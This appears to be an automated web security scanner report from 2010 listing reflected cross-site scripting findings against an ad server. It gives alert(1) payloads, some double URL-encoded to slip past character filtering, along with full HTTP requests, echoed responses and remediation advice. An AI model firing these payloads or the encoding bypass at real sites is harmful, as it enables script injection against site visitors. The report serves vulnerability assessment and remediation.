HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1929
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a63135799764"><script>alert(1)</script>e90710d87cb/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94844%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb32014b325 was submitted in the REST URL parameter 3. This input was echoed as 94844"><script>alert(1)</script>b32014b325 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x3394844%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb32014b325/0.2084487870534576 HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x3394844"><script>alert(1)</script>b32014b325/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc53%2522%253balert%25281%2529%252f%252f862f59f63eb was submitted in the REST URL parameter 3. This input was echoed as 6cc53";alert(1)//862f59f63eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x336cc53%2522%253balert%25281%2529%252f%252f862f59f63eb/0.2084487870534576 HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1884
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x336cc53";alert(1)//862f59f63eb/1290209590**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ff13"-alert(1)-"56d7644f92 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:01 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 2337
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... na42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*4ff13"-alert(1)-"56d7644f92"> ...[SNIP]...
The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd7ff"><script>alert(1)</script>dc019ab0230 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:01 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 2369
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... na42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*dd7ff"><script>alert(1)</script>dc019ab0230http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
2.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c6f8"-alert(1)-"5117fe222e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:09 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 2345
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... a42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&8c6f8"-alert(1)-"5117fe222e0=1"> ...[SNIP]...
2.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b283c"><script>alert(1)</script>008acd22d8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:08 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 2375
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... a42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&b283c"><script>alert(1)</script>008acd22d8c=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of the 10,1,102,64;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0d08'-alert(1)-'40c23d3dbd0 was submitted in the 10,1,102,64;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:27 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4cdc67692496d; expires=Sun, 19-Dec-2010 23:33:27 GMT; path=/ Set-Cookie: i_1=46:1354:802:44:0:32947:1290209607:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; expires=Sun, 19-Dec-2010 23:33:27 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 724
function wsod_image() { document.write('<a href="http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*b0d08'-alert(1)-'40c23d3dbd0http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.802.iframe.200x33/**;10.1102;1920;1200;http:_@2F_@2Fmy.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out more!"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fab6b%2522%253balert%25281%2529%252f%252f4025c98bb28 was submitted in the REST URL parameter 2. This input was echoed as fab6b";alert(1)//4025c98bb28 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357fab6b%2522%253balert%25281%2529%252f%252f4025c98bb28/1354.0.iframe.200x33/1290207275** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1884
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357fab6b";alert(1)//4025c98bb28/1354.0.iframe.200x33/1290209590**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59a15%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50fd7015941 was submitted in the REST URL parameter 2. This input was echoed as 59a15"><script>alert(1)</script>50fd7015941 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135759a15%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50fd7015941/1354.0.iframe.200x33/1290207275** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1929
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a63135759a15"><script>alert(1)</script>50fd7015941/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e66a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f40fdd33ec was submitted in the REST URL parameter 3. This input was echoed as 8e66a"><script>alert(1)</script>0f40fdd33ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x338e66a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f40fdd33ec/1290207275** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1929
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x338e66a"><script>alert(1)</script>0f40fdd33ec/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50920%2522%253balert%25281%2529%252f%252f3c39df87c6c was submitted in the REST URL parameter 3. This input was echoed as 50920";alert(1)//3c39df87c6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x3350920%2522%253balert%25281%2529%252f%252f3c39df87c6c/1290207275** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1884
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x3350920";alert(1)//3c39df87c6c/1290209593**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
2.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2e20'-alert(1)-'7aac6d5594e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:35:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4cdc67692496d; expires=Sun, 19-Dec-2010 23:35:20 GMT; path=/ Set-Cookie: i_1=46:1354:798:44:0:32947:1290209720:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; expires=Sun, 19-Dec-2010 23:35:20 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 730
function wsod_image() { document.write('<a href="http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&d2e20'-alert(1)-'7aac6d5594e=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.798.iframe.200x33/**;10.1102;1920;1200;http:_@2F_@2Fmy.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out more!" ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db92e%2522%253balert%25281%2529%252f%252fe91708cc198 was submitted in the REST URL parameter 2. This input was echoed as db92e";alert(1)//e91708cc198 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357db92e%2522%253balert%25281%2529%252f%252fe91708cc198/475.0.iframe.200x33/1290207264971902 HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:32:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1881
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357db92e";alert(1)//e91708cc198/475.0.iframe.200x33/1290209579**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b3e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec39f7a1a8ef was submitted in the REST URL parameter 2. This input was echoed as 3b3e5"><script>alert(1)</script>c39f7a1a8ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313573b3e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec39f7a1a8ef/475.0.iframe.200x33/1290207264971902 HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:32:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313573b3e5"><script>alert(1)</script>c39f7a1a8ef/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67d47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e3f3a3635d was submitted in the REST URL parameter 3. This input was echoed as 67d47"><script>alert(1)</script>2e3f3a3635d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x3367d47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e3f3a3635d/1290207264971902 HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x3367d47"><script>alert(1)</script>2e3f3a3635d/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae354%2522%253balert%25281%2529%252f%252f424e1783b9d was submitted in the REST URL parameter 3. This input was echoed as ae354";alert(1)//424e1783b9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33ae354%2522%253balert%25281%2529%252f%252f424e1783b9d/1290207264971902 HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
